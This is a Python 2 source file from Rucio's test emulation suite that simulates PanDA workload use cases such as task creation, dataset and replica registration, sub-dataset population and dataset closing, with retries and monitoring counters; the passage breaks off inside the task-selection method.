# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Ralph Vigne, <ralph.vigne@cern.ch>, 2013
import datetime
import bisect
import os
import pickle
import sys
import threading
import time
from Queue import Queue
from random import choice, gauss, sample, random, randint
from requests.exceptions import ConnectionError
from rucio.client import Client
from rucio.common.exception import DatabaseException, DataIdentifierNotFound, UnsupportedOperation
from rucio.common.utils import generate_uuid as uuid
from rucio.core import monitor
from rucio.tests.emulation.ucemulator import UCEmulator
class UseCaseDefinition(UCEmulator):
"""
Implements all PanDA use cases.
"""
@UCEmulator.UseCase
def CREATE_TASK(self, task_type, rses, input, output, file_transfer_duration, bulk, threads, safety_delay):
target_rses = list()
task_type_id = task_type.split('.')[1].split('-')[0]
task_number = '%08d' % randint(0, 100000000)
if threads:
sem = threading.BoundedSemaphore(threads)
if 'output_datasets_per_datatype' in output.keys():
output_datasets_per_datatype = output['output_datasets_per_datatype']
if (output_datasets_per_datatype % 1) != 0: # Fraction is a decimal, decide final number by chance
output_datasets_per_datatype = int(output_datasets_per_datatype) if ((output_datasets_per_datatype % 1) < random()) else int(output_datasets_per_datatype) + 1
else:
output_datasets_per_datatype = 1
input_ds_used = False if input['dss'] is None else True
if 'create_subs' in output.keys():
create_sub_ds = output['create_subs'] == "True"
else:
create_sub_ds = False
if (task_type.startswith('user') or task_type.startswith('group')): # User task is created
ext = task_type.split('.')[0]
create_dis_ds = False
log_ds = False
rse = None
for i in range(output_datasets_per_datatype):
while (rse is None) or (rse in target_rses):
rse = choice(rses)
target_rses.append(rse)
else: # Production task output stuff is created
ext = 'out'
rse = choice(rses)
for i in range(output_datasets_per_datatype):
target_rses.append(rse)
if input_ds_used:
if input['dis_ds_probability'] == 0:
create_dis_ds = False
elif input['dis_ds_probability'] == 1:
create_dis_ds = True
else:
create_dis_ds = (input['dis_ds_probability'] >= random())
else:
create_dis_ds = False
log_ds = True
client = Client(account='panda')
if 'lifetime' not in output.keys():
output['lifetime'] = None
# ----------------------- List replicas and derive list of files from it -------------------
replicas = list()
if input_ds_used:
while input_ds_used and len(input['dss']) and not len(replicas):
temp = input['dss'].pop()
now = time.time()
print '== PanDA: Checking %s as input' % temp
try:
with monitor.record_timer_block('panda.list_replicas'):
replicas = [f for f in client.list_replicas(scope=temp[0], name=temp[1])]
except (DatabaseException, DataIdentifierNotFound, ConnectionError):
replicas = list()
pass
delta = time.time() - now
if len(replicas):
monitor.record_timer('panda.list_replicas.normalized', delta / len(replicas))
if len(replicas) == 0:
print '== PanDA: Empty input dataset provided'
monitor.record_counter('panda.tasks.%s.EmptyInputDataset' % task_type, 1)
return {'jobs': [], 'task': [], 'subs': []}
input['scope'] = temp[0]
input['ds_name'] = temp[1]
if log_ds: # Production task
output['scope'] = temp[0]
# Should be changed when the response from list_replicas is updated
files = list()
file_keys = list()
cnt_rses = dict()
for r in replicas:
if '%s:%s' % (r['scope'], r['name']) not in file_keys:
file_keys.append('%s:%s' % (r['scope'], r['name']))
files.append({'scope': r['scope'], 'name': r['name'], 'bytes': r['bytes']})
if ('max_jobs' in input.keys()) and (len(files) > (input['max_jobs'] * input['number_of_inputfiles_per_job'])):
monitor.record_counter('panda.tasks.%s.limited_input' % task_type, 1)
break
for tmp_rse in r['rses']:
if tmp_rse not in cnt_rses.keys():
cnt_rses[tmp_rse] = 0
cnt_rses[tmp_rse] += 1
print '== PanDA: Replica distribution over RSEs: %s files -> %s' % (len(files), cnt_rses)
if not (task_type.startswith('user') or task_type.startswith('group')): # Production task
rse = sorted(cnt_rses, key=cnt_rses.get, reverse=True)[0]
for i in range(len(target_rses)):
target_rses[i] = rse
monitor.record_counter('panda.tasks.%s.input_files' % task_type, len(files)) # Reports the number of files in the input dataset of the task type
# Release memory by cleaning the two objects
file_keys = None
# ------------------------------- Determine metadata for output dataset ------------------------------------
meta = dict()
success = False
retry = 1
print '---- List meta'
while not success:
try:
with monitor.record_timer_block('panda.get_metadata'):
meta_i = client.get_metadata(scope=input['scope'], name=input['ds_name'])
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.get_metadata.%s' % (retry), 1)
retry += 1
if retry > 5:
monitor.record_counter('panda.tasks.%s.missing_input_meta.timeout' % (task_type), 1)
raise
for key in ['stream_name', 'project']:
if meta_i[key] is not None:
meta[key] = meta_i[key]
else:
monitor.record_counter('panda.tasks.%s.missing_input_meta.%s' % (task_type, key), 1)
if key == 'stream_name':
meta[key] = 'physics_Egamma'
elif key == 'project':
meta[key] = 'mc12_8TeV'
else:
meta[key] = 'NotGivenByInput'
else:
output['scope'] = choice(['mc12_8TeV', 'mc13_14TeV'])
input['ds_name'] = uuid()
meta = {'stream_name': 'dummy', 'project': output['scope']}
input['number_of_inputfiles_per_job'] = 1
files = ['file_%s' % f for f in xrange(input['max_jobs'])]
meta['run_number'] = int(time.time() / (3600 * 24))
meta['version'] = uuid()
# ----------------------------------- Create final output - dataset(s) ---------------------------------------
print '-------------- Create output DS'
final_dss = {}
for out_ds in output['meta']: # Create output containers(s)
meta['prod_step'] = out_ds.split('.')[0]
meta['datatype'] = out_ds.split('.')[1]
ds = '.'.join([meta['project'], str(meta['run_number']), meta['stream_name'], meta['prod_step'], meta['datatype'], meta['version'], ext])
final_dss[ds] = meta.copy()
if log_ds:
ds = '.'.join([meta['project'], str(meta['run_number']), meta['stream_name'], meta['prod_step'], meta['datatype'], meta['version'], 'log'])
final_dss[ds] = meta.copy()
temp_ds = list()
for fds in final_dss:
temp = list()
success = False
retry = 1
while not success:
print 'Creating container: cnt_%s' % fds
try:
with monitor.record_timer_block('panda.add_container'):
client.add_container(scope=output['scope'], name='cnt_%s' % (fds))
monitor.record_counter('panda.tasks.%s.container' % task_type, 1) # Reports the creation of a container
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.add_container.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
time.sleep(randint(1, 2))
for i in range(output_datasets_per_datatype):
final_dss[fds].update({'guid': str(uuid())})
dsn2 = '%s.%s' % (fds, i)
out_ds = {'scope': output['scope'], 'name': dsn2, 'dids': [], 'meta': final_dss[fds].copy(),
'rules': [{'account': output['account'], 'copies': 1, 'rse_expression': target_rses[i], 'grouping': 'DATASET', 'lifetime': output['lifetime']}]}
temp.append(out_ds)
success = False
retry = 1
while not success:
try:
with monitor.record_timer_block(['panda.add_datasets', ('panda.add_datasets.normalized', len(temp))]):
client.add_datasets(temp)
monitor.record_counter('panda.tasks.%s.output_datasets' % task_type, len(temp)) # Reports the number of output datasets for the tasktype (including log datasets)
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.add_datasets.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
time.sleep(randint(1, 2))
success = False
retry = 1
while not success:
try:
with monitor.record_timer_block(['panda.add_datasets_to_container', ('panda.add_datasets_to_container.normalized', len(temp))]):
client.add_datasets_to_container(scope=output['scope'], name='cnt_%s' % (fds), dsns=[{'scope': d['scope'], 'name': d['name']} for d in temp])
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.add_datasets_to_container.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
time.sleep(randint(1, 2))
temp_ds += temp
final_dss = [dsn['name'] for dsn in temp_ds]
# -------------------------------- Derive/Create dis and subdatasets ------------------------------------------
print '-------------- Create dis/sub DS'
jobs = []
files_in_ds = []
dis_ds = None
computing_rse = None
job_count = 0
inserts_dis = list()
inserts_sub = list()
if 'number_of_inputfiles_per_job' not in input.keys():
input['number_of_inputfiles_per_job'] = 1
# ----------------------- Derive number of jobs depending on the input dataset ------------------------
job_count = float(len(files)) / input['number_of_inputfiles_per_job']
if (job_count % 1) != 0:
job_count = int(job_count) + 1
if ('max_jobs' in input.keys()) and (job_count >= input['max_jobs']):
job_count = input['max_jobs']
used_rses = dict()
if create_dis_ds: # Creating DIS - Datasets
count_dis = float(job_count) / input['jobs_per_dis']
if (count_dis % 1) != 0:
count_dis = int(count_dis) + 1
for i in range(int(count_dis)):
id = uuid()
dis_ds = '%s_DIS_%s' % (input['ds_name'], id)
fpd = float(input['jobs_per_dis']) * input['number_of_inputfiles_per_job']
start = int(i * fpd) # If not int, remove digits to get the lower number
fpd = int(fpd) + 1 if (fpd % 1) != 0 else int(fpd) # Must include every file that is (partly) used
end = start + fpd
if end > len(files):
print '== PanDA Warning: Missing proper number of files per DIS (%s - %s (Files: %s))' % (start, end, len(files))
end = len(files)
start = end - fpd if (end - fpd) > 0 else 0
print '== PanDA Warning: Chosen %s - %s instead' % (start, end)
files_in_ds = [files[r] for r in range(start, end)]
if not len(files_in_ds):
break
if create_sub_ds:
while (target_rses[0] == computing_rse) or (computing_rse is None):
computing_rse = choice(rses) # Random choice of the computing RSE
else:
computing_rse = target_rses[0] # If no sub, no output is moved, therefore target rse = computing rse
temp_job_count = int(float(len(files_in_ds)) / input['number_of_inputfiles_per_job'])
if temp_job_count > input['jobs_per_dis']:
temp_job_count = input['jobs_per_dis']
if computing_rse not in used_rses.keys():
used_rses[computing_rse] = list()
used_rses[computing_rse].append((id, temp_job_count))
inserts_dis.append({'scope': 'Manure', 'name': dis_ds, 'lifetime': 172800,
'rules': [{'account': 'panda', 'copies': 1, 'rse_expression': computing_rse, 'grouping': 'DATASET'}],
'dids': files_in_ds}) # Create DIS-Datasets
monitor.record_counter('panda.tasks.%s.dis_datasets' % task_type, 1) # Reports the creation of a dis dataset for the given task type
monitor.record_counter('panda.tasks.%s.dis_files' % task_type, len(files_in_ds)) # Reports the number of files in the dis - dataset
computing_rse = None
else: # No Dis created, protect files by rules from deletion
if task_type.startswith('prod'): # T1 job, single RSE
if input_ds_used: # Create rules to protect replicas from deletion
with monitor.record_timer_block(['panda.add_replication_rule', ('panda.add_replication_rule.normalized', len(files))]):
client.add_replication_rule(files, copies=1, rse_expression=target_rses[0],
grouping='NONE', account='panda', lifetime=172800)
temp_job_count = int(float(len(files)) / input['number_of_inputfiles_per_job'])
temp_job_count = int(temp_job_count) + 1 if (temp_job_count % 1) != 0 else int(temp_job_count)
used_rses[target_rses[0]] = [(None, temp_job_count)]
else: # User or Group, each out-ds on different RSE
fpd = float(len(files)) / output_datasets_per_datatype
if (fpd % 1) != 0:
fpd = int(fpd) + 1
for i in range(int(output_datasets_per_datatype)):
files_in_ds = []
start = int(i * fpd) if ((i * fpd) < len(files)) else int(len(files) - fpd)
end = int(start + fpd) if (start + fpd) < len(files) else len(files)
try:
files_in_ds = [files[f] for f in range(start, end)]
except IndexError:
print '== PanDA Warning: Missing proper number of files per out-DS (%s - %s (%s))' % (start, end, len(files))
if not len(files_in_ds):
break
computing_rse = target_rses[i]
if input_ds_used: # Create rules to protect replicas from deletion
with monitor.record_timer_block(['panda.add_replication_rule', ('panda.add_replication_rule.normalized', len(files_in_ds))]):
client.add_replication_rule(files_in_ds, copies=1, rse_expression=computing_rse,
grouping='NONE', account='panda', lifetime=172800)
temp_job_count = int(float(len(files_in_ds)) / input['number_of_inputfiles_per_job']) + 1
if computing_rse not in used_rses.keys():
used_rses[computing_rse] = list()
used_rses[computing_rse].append((None, temp_job_count))
computing_rse = None
for computing_rse in used_rses:
for temp in used_rses[computing_rse]:
jobs.append((output['scope'], final_dss, int(temp[1]), computing_rse))
# -------------------------------------- Perform bulk inserts ----------------------------------------
ts = list()
ts_res = Queue()
for ds in inserts_dis:
if threads:
t = threading.Thread(target=self.add_files_ds, kwargs={'client': client, 'ds': ds, 'ret': ts_res, 'sem': sem})
t.start()
ts.append(t)
else:
self.add_files_ds(client, ds)
if threads:
for t in ts:
t.join()
while not ts_res.empty():
ret = ts_res.get()
if not ret[0]:
print ret[1][2]
raise ret[1][0]
# --------------------------------------- Calculate finishing times ----------------------------------
job_finish = [] # When each job finishes -> register output files(s)
# When jobs are finished for dataset
sub_finish = dict()
max_completion = 0
job_number = 0
for job_set in jobs:
# job_set: (scope, [target datasets], number of jobs, computing_rse, task_type, log_ds)
dis_completion = time.time()
if create_dis_ds:
dis_completion += gauss(**file_transfer_duration) # Determines the time it takes to move all files to the target RSE
# Determine the finishing time of each job using again a gaussian distribution
max_target_completion = 0
temp = float(job_set[2]) / output_datasets_per_datatype
temp = int(temp) + 1 if (temp % 1 != 0) else int(temp)
for i in xrange(temp):
job_completion = dis_completion + gauss(**output['duration_job'])
if job_completion > max_target_completion:
max_target_completion = job_completion
job_number += 1
job_finish.append((float(job_completion), {'scope': job_set[0], 'targets': job_set[1], 'computing_rse': job_set[3],
'task_type': task_type, 'log_ds': log_ds, 'task_type_id': task_type_id,
'task_number': task_number, 'job_number': '%06d' % job_number}))
# Remember last access to target dataset
max_target_completion += safety_delay
for dsn in job_set[1]:
if (dsn not in sub_finish.keys()) or (sub_finish[dsn][0] < max_target_completion):
for fin_ds in final_dss:
if dsn.endswith(fin_ds):
sub_finish[dsn] = (float(max_target_completion), {'source': {'scope': job_set[0], 'name': dsn}, 'target': {'scope': output['scope'], 'name': fin_ds}, 'task_type': task_type})
# Update task completion
if max_completion < max_target_completion:
max_completion = max_target_completion
max_completion += safety_delay # Note: Triggers FINISH_TASK some time later to avoid conflicts if job is stuck in gearman queue
if create_sub_ds:
max_completion += gauss(**file_transfer_duration)
else:
sub_finish = {} # Empty list of sub datasets to avoid data moving when task is finished
task_finish = (float(max_completion), {'scope': output['scope'], 'targets': final_dss, 'task_type': task_type, 'log_ds': log_ds})
monitor.record_counter('panda.tasks.%s.dispatched' % task_type, 1) # Reports the task type which is dispatched
monitor.record_counter('panda.tasks.%s.number_job' % task_type, len(job_finish) * output_datasets_per_datatype) # Reports the number of jobs spawned from the given task
print '== PanDA: Create %s task with %s files (%s repl.) with output scope %s (dis: %s / sub: %s (%s)/ log_ds: %s / out_ds: %s / jobs: %s (%s))' % (task_type, len(files), len(replicas),
output['scope'], len(inserts_dis),
len(inserts_sub), len(sub_finish), log_ds,
final_dss, job_count, len(job_finish) * output_datasets_per_datatype)
# print '-', job_finish
# print '-', sub_finish
# print '-', task_finish
return {'jobs': job_finish, 'subs': sub_finish.values(), 'task': task_finish}
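# add_files_ds: protects the files of a DIS dataset by adding a replication
# rule for its DIDs on the configured RSE, retrying up to five times on
# database or connection errors; when run in a worker thread the outcome is
# reported through the `ret` queue and concurrency is bounded by `sem`.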
def add_files_ds(self, client, ds, ret=None, sem=None):
print '+' * 100
print ds
print '+' * 100
if not client:
client = Client(account='panda')
success = False
retry = 1
for rule in ds['rules']:
while not success:
try:
if sem:
sem.acquire()
with monitor.record_timer_block(['panda.client.add_replication_rule', ('panda.client.add_replication_rule.normalized', len(ds['dids']))]):
bla = client.add_replication_rule(dids=ds['dids'], rse_expression=rule['rse_expression'], account=rule['account'], copies=rule['copies'], lifetime=172800)
print bla
success = True
except (DatabaseException, ConnectionError):
e = sys.exc_info()
monitor.record_counter('panda.retry.add_files_to_dataset.%s' % (retry), 1)
retry += 1
if retry > 5:
if ret:
ret.put((False, e))
return
else:
print e
raise
print '== PanDA Warning [%s]: Failed %s times when adding files to dataset (%s:%s). Will retry in 5 seconds.' % (time.strftime('%D %H:%M:%S', time.localtime()), retry, ds['scope'], ds['name'])
time.sleep(randint(1, 2))
except:
e = sys.exc_info()
if ret:
ret.put((False, e))
else:
print e
raise
finally:
if sem:
sem.release()
if ret:
ret.put((True, None))
def CREATE_TASK_input(self, ctx):
try:
# Select input DS from file provided by Cedric using observed age distribution from Thomas
# Select task type
success = False
task_type = ''
while not success:
exit = False
while not exit:
tt = choice(ctx.task_distribution)
exit = (tt.startswith(task_type.split('-')[0]) or (task_type == ''))
# print '== PanDA [%s]: Selecting task from group %s' % (time.strftime('%D %H:%M:%S', time.localtime()), tt.split('-')[0])
task_type = tt
ret = {'input': ctx.tasks[task_type]['input'],
'output': ctx.tasks[task_type]['output'],
'task_type': task_type,
'rses': [ctx.rses[i] for i in sample(xrange(len(ctx.rses)), 20)],
'file_transfer_duration': ctx.file_transfer_duration,
'safety_delay': ctx.safety_delay,
}
if ('meta' in ctx.tasks[task_type]['input'].keys()) and (len(ctx.tasks[task_type]['input']['meta'])): # Task depends on input dataset
ret['input']['dss'] = list()
for i in range(10):
input_ds = self.select_input_ds(task_type, ctx)
if not input_ds:
continue
ret['input']['dss'].append(input_ds)
else: # Task activity is base on max_jobs
ret['input']['dss'] = None
success = True
if task_type.split('.')[0] == 'user':
user = choice(ctx.users)
ret['output']['scope'] = 'user.%s' % user
ret['output']['account'] = user
elif task_type.split('.')[0] == 'group':
group = choice(ctx.groups)
ret['output']['scope'] = 'group.%s' % group
ret['output']['account'] = group
else:
ret['output']['account'] = 'panda'
ret['bulk'] = ctx.bulk == 'True'
if (ctx.threads == 'False') or int(ctx.threads) < 2:
ret['threads'] = None
else:
ret['threads'] = int(ctx.threads)
return ret
except Exception, e:
print e
def CREATE_TASK_output(self, ctx, output):
for key in ['jobs', 'subs', 'task']:
if key not in output.keys():
return
now = time.time()
with ctx.job_queue_mutex:
monitor.record_timer('panda.helper.waiting.job_queue_mutex.sorting', (time.time() - now))
for job in output['jobs']:
with monitor.record_timer_block('panda.helper.sorting_jobs'):
bisect.insort(ctx.job_queue, job)
now = time.time()
with ctx.sub_queue_mutex:
monitor.record_timer('panda.helper.waiting.sub_queue_mutex.sorting', (time.time() - now))
for sub in output['subs']:
with monitor.record_timer_block('panda.helper.sorting_subs'):
bisect.insort(ctx.sub_queue, sub)
if len(output['task']):
now = time.time()
with ctx.task_queue_mutex:
monitor.record_timer('panda.helper.waiting.task_queue_mutex.sorting', (time.time() - now))
with monitor.record_timer_block('panda.helper.sorting_tasks'):
bisect.insort(ctx.task_queue, output['task'])
@UCEmulator.UseCase
def FINISH_JOB(self, jobs, threads):
client = Client(account='panda')
if threads:
sem = threading.BoundedSemaphore(threads)
# Group jobs by sub: if the frequency on the DB should be decreased
ts = list()
ts_res = Queue()
for job in jobs:
if threads:
t = threading.Thread(target=self.register_replica, kwargs={'client': client, 'job': job, 'ret': ts_res, 'sem': sem})
t.start()
ts.append(t)
else:
self.register_replica(client, job)
if threads:
for t in ts:
t.join()
while not ts_res.empty():
ret = ts_res.get()
if ret[0] is False:
print ret[1][2]
raise ret[1][0]
targets = []
replicas = 0
for job in jobs:
targets += job['targets']
replicas += len(job['targets']) if job['log_ds'] else (2 * len(job['targets']))
print '== PanDA [%s]: Registering %s replicas from %s jobs over %s different datasets' % (time.strftime('%D %H:%M:%S', time.localtime()), replicas, len(jobs), len(set(targets)))
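# register_replica: builds the output (and, where needed, log) file entries of
# a finished job and attaches them to the job's target datasets on the
# computing RSE via attach_dids_to_dids, retrying on DatabaseException.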
def register_replica(self, client, job, ret=None, sem=None):
if not client:
client = Client(account='panda')
count = 0
# TODO: Instead of this loop the attach_dids_to_dids method should be used
attachments = list()
for tds in job['targets']:
# Create output files of the job
out_name = '%s.%s._%s.pool.root.1' % (job['task_type_id'], job['task_number'], job['job_number'])
log_name = 'log.%s.%s._%s.job.log.tgz.1' % (job['task_type_id'], job['task_number'], job['job_number'])
files = list()
if not job['log_ds']: # Add log file for each datatype if task doesn't have LOG dataset
files.append({'scope': job['scope'], 'name': out_name, 'bytes': 12345L, 'adler32': '0cc737eb', 'meta': {'guid': str(uuid())}})
files.append({'scope': job['scope'], 'name': log_name, 'bytes': 12345L, 'adler32': '0cc737eb', 'meta': {'guid': str(uuid())}})
else:
fn = out_name if tds.split('.')[-2] != 'log' else log_name
files.append({'scope': job['scope'], 'name': fn, 'bytes': 12345L, 'adler32': '0cc737eb', 'meta': {'guid': str(uuid())}})
attachments.append({'scope': job['scope'], 'name': tds, 'rse': job['computing_rse'], 'dids': files})
count += len(files)
success = False
retry = 1
e = None
now = time.time()
while not success:
try:
if sem:
sem.acquire()
with monitor.record_timer_block('panda.attach_dids_to_dids'):
client.attach_dids_to_dids(attachments=attachments)
success = True
except DatabaseException:
e = sys.exc_info()
monitor.record_counter('panda.retry.add_files_to_dataset.%s' % (retry), 1)
retry += 1
if retry > 5:
break
print '== PanDA Warning: Failed %s times when adding files to datasets: %s' % (retry, attachments)
time.sleep(randint(1, 2))
except:
e = sys.exc_info()
break
finally:
if sem:
sem.release()
if not success:
print '-' * 80
print '- Failed after %s seconds (retries: %s)' % ((time.time() - now), retry)
print '- %s:%s' % (job['scope'], tds)
print '-', files
print '-', job['log_ds']
print '-', e
print '-', count
print '-' * 80
if ret:
ret.put((False, e))
monitor.record_counter('panda.tasks.%s.replicas' % job['task_type'], count) # Reports the creation of a new replica (including log files) of the given task type
print '== PanDA: Job (%s) added %s files to %s datasets (%s:%s)' % (job['task_type'], count, len(job['targets']), job['scope'], job['targets'])
if ret:
ret.put((True, count))
def FINISH_JOB_input(self, ctx):
ctx.job_print += 1
if not len(ctx.job_queue):
if not ctx.job_print % 100:
print '== PanDA [%s]: No jobs scheduled so far.' % (time.strftime('%D %H:%M:%S', time.localtime()))
return None
jobs = []
if ctx.job_queue_select.acquire(False): # Check if there is already one thread waiting to select items from queue
now = time.time()
with ctx.job_queue_mutex:
monitor.record_timer('panda.helper.waiting.job_queue_mutex.selecting', (time.time() - now))
now = time.time()
tmp_cnt = 0
with monitor.record_timer_block('panda.helper.selecting_jobs'):
for job in ctx.job_queue:
tmp_cnt += 1
if job[0] < now:
jobs.append(job[1])
else:
if not len(jobs):
ctx.job_queue = sorted(ctx.job_queue, key=lambda job: job[0])
break
del ctx.job_queue[0:len(jobs)]
ctx.job_queue_select.release()
else:
print '== PanDA [%s]: Already one thread waiting for pending jobs.' % (time.strftime('%D %H:%M:%S', time.localtime()))
if (ctx.threads == 'False') or int(ctx.threads) < 2:
threads = None
else:
threads = int(ctx.threads)
if len(jobs):
print '== PanDA [%s]: Finishing %s jobs.' % (time.strftime('%D %H:%M:%S', time.localtime()), len(jobs))
monitor.record_counter('panda.helper.jobs_block', len(jobs))
return {'jobs': jobs, 'threads': threads}
else:
if not ctx.job_print % 100:
print '== PanDA [%s]: Next job finishes in %.1f minutes (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), ((ctx.job_queue[0][0] - now) / 60), time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[0][0])))
return None
@UCEmulator.UseCase
def POPULATE_SUB(self, subs, threads, safety_delay):
client = Client(account='panda')
ts = list()
ts_res = Queue()
if threads:
sem = threading.BoundedSemaphore(threads)
for sub in subs:
print sub
print '== PanDA [%s]: Populating SUB-DS (%s) to target (%s) for job %s' % (time.strftime('%D %H:%M:%S', time.localtime()), sub['source'], sub['target'], sub['task_type'])
if threads:
t = threading.Thread(target=self.aggregate_output, kwargs={'client': client, 'source': sub['source'], 'target': sub['target'],
'task_type': sub['task_type'], 'ret': ts_res, 'sem': sem})
t.start()
ts.append(t)
else:
self.aggregate_output(client, sub['source'], sub['target'], sub['task_type'])
if threads:
for t in ts:
t.join()
while not ts_res.empty():
ret = ts_res.get()
if not ret[0]:
print ret[1][2]
raise ret[1][0]
def POPULATE_SUB_input(self, ctx):
ctx.sub_print += 1
if not len(ctx.sub_queue):
if not ctx.sub_print % 100:
print '== PanDA [%s]: No subs scheduled so far.' % (time.strftime('%D %H:%M:%S', time.localtime()))
return None
subs = []
if ctx.sub_queue_select.acquire(False): # Check if there is already one thread waiting to select items from queue
now = time.time()
with ctx.sub_queue_mutex:
monitor.record_timer('panda.helper.waiting.sub_queue_mutex.selecting', (time.time() - now))
now = time.time()
with monitor.record_timer_block('panda.helper.selecting_subs'):
for sub in ctx.sub_queue:
if sub[0] < now:
subs.append(sub[1])
else:
if not len(subs):
ctx.sub_queue = sorted(ctx.sub_queue, key=lambda sub: sub[0])
break
del ctx.sub_queue[0:len(subs)]
ctx.sub_queue_select.release()
if (ctx.threads == 'False') or int(ctx.threads) < 2:
threads = None
else:
threads = int(ctx.threads)
if len(subs):
monitor.record_counter('panda.helper.subs_block', len(subs))
return {'subs': subs, 'threads': threads, 'safety_delay': ctx.safety_delay}
else:
if not ctx.sub_print % 100:
print '== PanDA [%s]: Next sub dataset is populated in %.1f minutes (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), ((ctx.sub_queue[0][0] - now) / 60), time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[0][0])))
return None
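# aggregate_output: lists the files of a SUB dataset, appends them to the final
# TID dataset and closes the SUB dataset, retrying each step and reporting the
# outcome through `ret` when executed in a worker thread.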
def aggregate_output(self, client, source, target, task_type, ret=None, sem=None):
now = time.time()
if not client:
client = Client(account='panda')
retry = 1
fs = list()
exc = None
# List files in SUB
while not len(fs):
try:
with monitor.record_timer_block('panda.list_files'):
fs = [f for f in client.list_files(**source)]
if len(fs):
monitor.record_timer('panda.list_files.normalized', (time.time() - now) / len(fs))
monitor.record_counter('panda.tasks.%s.sub_files' % task_type, len(fs))
print '== PanDA [%s]: Adding %s files from SUB (%s) to TID (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(fs), source, target)
else:
print '== PanDA Warning [%s]: No data task arrived for %s. Will Retry later.' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
retry += 1
if retry > 5:
print '== PanDA Warning [%s]: No data task arrived for %s. Gave up' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
monitor.record_counter('panda.tasks.%s.EmptySubDataset' % task_type, 1)
with monitor.record_timer_block('panda.close'):
client.close(**source)
return
time.sleep(randint(3, 5))
except DatabaseException:
exc = sys.exc_info()
fs = []
print '== PanDA [%s]: Waiting 5 seconds for task data to arrive in %s (retry count: %s / task-type: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), source, retry, task_type)
monitor.record_counter('panda.retry.list_files.%s' % (retry), 1)
retry += 1
if retry > 5:
print '== PanDA [%s]: No data task arrived for %s. Gave up' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
monitor.record_counter('panda.tasks.%s.EmptySubDataset' % task_type, 1)
with monitor.record_timer_block('panda.close'):
client.close(**source)
if ret:
ret.put((False, exc))
return
time.sleep(randint(1, 2))
except Exception:
exc = sys.exc_info()
if ret:
ret.put((False, exc))
else:
raise
# Append files to TID
try:
if sem:
sem.acquire()
success = False
retry = 1
while not success:
with monitor.record_timer_block(['panda.add_files_to_dataset', ('panda.add_files_to_dataset.normalized', len(fs))]):
client.add_files_to_dataset(scope=target['scope'], name=target['name'], files=fs)
success = True
except Exception:
exc = sys.exc_info()
print '== PanDA: Waiting 5 seconds for task data to arrive in %s (retry count: %s / task-type: %s)' % (source, retry, task_type)
monitor.record_counter('panda.retry.add_files_to_dataset.%s' % (retry), 1)
retry += 1
if retry > 5:
if ret:
ret.put((False, exc))
return
finally:
if sem:
sem.release()
print '== PanDA [%s]: Populated %s files from %s to %s' % (time.strftime('%D %H:%M:%S', time.localtime()), len(fs), source, target)
# Close SUB dataset
try:
if sem:
sem.acquire()
success = False
retry = 1
while not success:
with monitor.record_timer_block('panda.close'):
client.close(**source)
success = True
except Exception:
exc = sys.exc_info()
print '== PanDA: Waiting 5 seconds for task data to arrive in %s (retry count: %s / task-type: %s)' % (source, retry, task_type)
monitor.record_counter('panda.retry.close.%s' % (retry), 1)
retry += 1
if retry > 5:
if ret:
ret.put((False, exc))
return
finally:
if sem:
sem.release()
print '== PanDA [%s]: Closed sub dataset: %s' % (time.strftime('%D %H:%M:%S', time.localtime()), source)
if ret:
ret.put((True, None))
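# FINISH_TASK: for every output dataset of a finished task, list its files for
# monitoring and close the dataset, tolerating UnsupportedOperation (already
# closed) and retrying on DatabaseException.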
def FINISH_TASK(self, tasks, threads, safety_delay):
client = Client(account='panda')
for task in tasks:
task_type = task['task_type']
for target in task['targets']:
retry = 1
success = False
while not success:
try:
now = time.time()
with monitor.record_timer_block('panda.list_files'):
fs = [f for f in client.list_files(scope=task['scope'], name=target)]
if len(fs):
monitor.record_timer('panda.list_files.normalized', (time.time() - now) / len(fs))
monitor.record_counter('panda.tasks.%s.output_ds_size' % task_type, len(fs)) # Reports the number of files added to the output dataset
else:
monitor.record_counter('panda.tasks.%s.EmptyOutputDataset' % task_type, 1)
success = True
except DatabaseException:
monitor.record_counter('panda.retry.close.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
print '== PanDA Warning [%s]: Failed %s times to list files in dataset (%s:%s). Will retry in 5 seconds.' % (time.strftime('%D %H:%M:%S', time.localtime()), retry, task['scope'], target)
time.sleep(randint(1, 2))
except Exception:
e = sys.exc_info()
print '-' * 80
print '- Failed listing files in TID: %s:%s' % (task['scope'], target)
print '-', e
print '-' * 80
raise
retry = 1
success = False
while not success:
try:
with monitor.record_timer_block('panda.close'):
client.close(scope=task['scope'], name=target)
success = True
except UnsupportedOperation:
break
except DatabaseException:
monitor.record_counter('panda.retry.close.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
print '== PanDA Warning: Failed %s times to close the dataset (%s:%s). Will retry in 5 seconds.' % (retry, task['scope'], target)
time.sleep(randint(1, 2))
print '== PanDA [%s]: Closed output dataset %s:%s from task (%s) including %s files' % (time.strftime('%D %H:%M:%S', time.localtime()), task['scope'], target, task_type, len(fs))
monitor.record_counter('panda.tasks.%s.finished' % task_type, 1)
def FINISH_TASK_input(self, ctx):
ctx.task_print += 1
if not len(ctx.task_queue):
if not ctx.task_print % 100:
print '== PanDA [%s]: No tasks scheduled so far.' % (time.strftime('%D %H:%M:%S', time.localtime()))
return None
tasks = []
if ctx.task_queue_select.acquire(False): # Check if there is already one thread waiting to select items from queue
now = time.time()
with ctx.task_queue_mutex:
monitor.record_timer('panda.helper.waiting.task_queue_mutex.selecting', (time.time() - now))
now = time.time()
with monitor.record_timer_block('panda.helper.selecting_tasks'):
for task in ctx.task_queue:
if task[0] < now:
tasks.append(task[1])
else:
if not len(tasks):
ctx.task_queue = sorted(ctx.task_queue, key=lambda task: task[0])
break
del ctx.task_queue[0:len(tasks)]
